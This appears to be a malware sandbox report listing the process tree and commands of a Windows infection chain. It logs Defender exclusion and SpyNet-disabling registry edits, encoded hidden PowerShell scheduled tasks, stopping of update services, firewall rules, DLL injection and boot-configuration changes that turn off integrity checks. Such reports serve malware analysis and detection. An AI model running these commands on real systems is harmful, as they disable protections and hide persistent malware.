PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2784 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 2548 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 556 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 1380 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\E45A.exe
PID 1380 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\E45A.exe
PID 1380 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\E45A.exe
PID 1380 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\E45A.exe
PID 2808 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2808 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2808 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2808 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2808 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2808 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 992 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 2660 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe

"C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe"

C:\Users\Admin\AppData\Local\Temp\DDD1.exe

C:\Users\Admin\AppData\Local\Temp\DDD1.exe

C:\Users\Admin\AppData\Local\Temp\DEFB.exe

C:\Users\Admin\AppData\Local\Temp\DEFB.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DFB7.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\E0A2.exe

C:\Users\Admin\AppData\Local\Temp\E0A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\E45A.exe

C:\Users\Admin\AppData\Local\Temp\E45A.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2660 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\E823.exe

C:\Users\Admin\AppData\Local\Temp\E823.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1780 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 268

C:\Windows\system32\taskeng.exe

taskeng.exe {F3ED27E6-44C0-4688-A65F-939C67CA0560} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\7DED.exe

C:\Users\Admin\AppData\Local\Temp\7DED.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\8FB9.exe

C:\Users\Admin\AppData\Local\Temp\8FB9.exe

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS91D4.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\963F.exe

C:\Users\Admin\AppData\Local\Temp\963F.exe

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\is-SDVPU.tmp\is-IMVKK.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SDVPU.tmp\is-IMVKK.tmp" /SL4 $70268 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS94FF.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gGtmRSDNc" /SC once /ST 00:25:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gGtmRSDNc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\DE67.exe

C:\Users\Admin\AppData\Local\Temp\DE67.exe

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045329.log C:\Windows\Logs\CBS\CbsPersist_20231025045329.cab

C:\Users\Admin\AppData\Local\Temp\EE30.exe

C:\Users\Admin\AppData\Local\Temp\EE30.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gGtmRSDNc"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QLkXvZI.exe\" 3Y /yPsite_idQPP 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {446155A4-2056-495F-A423-300C16549166} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 256

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QLkXvZI.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QLkXvZI.exe 3Y /yPsite_idQPP 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gxgKrmlrs" /SC once /ST 00:59:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gxgKrmlrs"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gxgKrmlrs"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\iNQrsrGq\OUdSrefCpuMhUjXZ.wsf"

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\iNQrsrGq\OUdSrefCpuMhUjXZ.wsf"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

